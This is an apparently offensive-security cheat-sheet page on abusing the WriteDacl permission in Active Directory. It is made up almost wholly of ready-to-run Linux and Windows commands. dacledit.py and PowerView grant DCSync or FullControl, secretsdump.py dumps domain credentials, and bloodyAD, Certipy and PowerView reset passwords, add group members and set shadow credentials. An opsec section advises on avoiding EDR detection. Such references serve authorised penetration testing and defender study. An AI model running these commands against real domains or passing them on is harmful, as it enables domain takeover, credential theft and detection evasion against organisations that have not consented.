🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🩸 BloodHound / WriteDacl

WriteDacl

Source can modify the DACL (Discretionary Access Control List) on the target, allowing it to grant itself any right

Applies to: User/Group/Computer β†’ User, Group, Computer, Domain, GPO

Linux Abuse

Grant GenericAll/DCSync on Domain object

dacledit.py -action write -rights DCSync \
    -principal <username> \
    -target-dn 'DC=<domain>,DC=<tld>' \
    '<domain>/<username>:<password>' -dc-ip <dc-ip>

secretsdump.py '<domain>/<username>:<password>' -dc-ip <dc-ip>

Grant GenericAll on target User

dacledit.py -action write -rights FullControl \
    -principal <username> \
    -target-dn 'CN=<target-user>,CN=Users,DC=<domain>,DC=<tld>' \
    '<domain>/<username>:<password>' -dc-ip <dc-ip>

# Then abuse GenericAll: reset password, shadow creds, Kerberoast, etc.
bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> set password <target-user> '<new-password>'

Grant GenericAll on target Group

dacledit.py -action write -rights FullControl \
    -principal <username> \
    -target-dn 'CN=<target-group>,CN=Users,DC=<domain>,DC=<tld>' \
    '<domain>/<username>:<password>' -dc-ip <dc-ip>

bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> add groupMember '<target-group>' '<username>'

Grant GenericAll on target Computer

dacledit.py -action write -rights FullControl \
    -principal <username> \
    -target-dn 'CN=<target-computer>,CN=Computers,DC=<domain>,DC=<tld>' \
    '<domain>/<username>:<password>' -dc-ip <dc-ip>

# Then RBCD or shadow credentials
certipy-ad shadow auto -u <username>@<domain> -p '<password>' -account <target-computer$> -dc-ip <dc-ip>

Windows Abuse

Grant DCSync rights on Domain

$Rights = [System.DirectoryServices.ActiveDirectoryRights]"ExtendedRight"
$ControlType = [System.Security.AccessControl.AccessControlType]::Allow
$InheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance]::None

# Using PowerView
Add-DomainObjectAcl -TargetIdentity '<domain>' -PrincipalIdentity '<username>' -Rights DCSync -Credential $cred

Grant FullControl on target User

Add-DomainObjectAcl -TargetIdentity '<target-user>' -PrincipalIdentity '<username>' -Rights All -Credential $cred
# Then:
Set-DomainUserPassword -Identity <target-user> -AccountPassword (ConvertTo-SecureString '<new-password>' -AsPlainText -Force) -Credential $cred

Grant FullControl on target Group

Add-DomainObjectAcl -TargetIdentity '<target-group>' -PrincipalIdentity '<username>' -Rights All -Credential $cred
Add-DomainGroupMember -Identity '<target-group>' -Members '<username>' -Credential $cred

Cleanup

Remove-DomainObjectAcl -TargetIdentity '<target-user>' -PrincipalIdentity '<username>' -Rights All -Credential $cred

Opsec

  • ACL changes on high-value objects (Domain, DA group) generate event 4670 and are monitored by most EDRs
  • Prefer granting DCSync or targeted writes over FullControl β€” smaller footprint in the DACL diff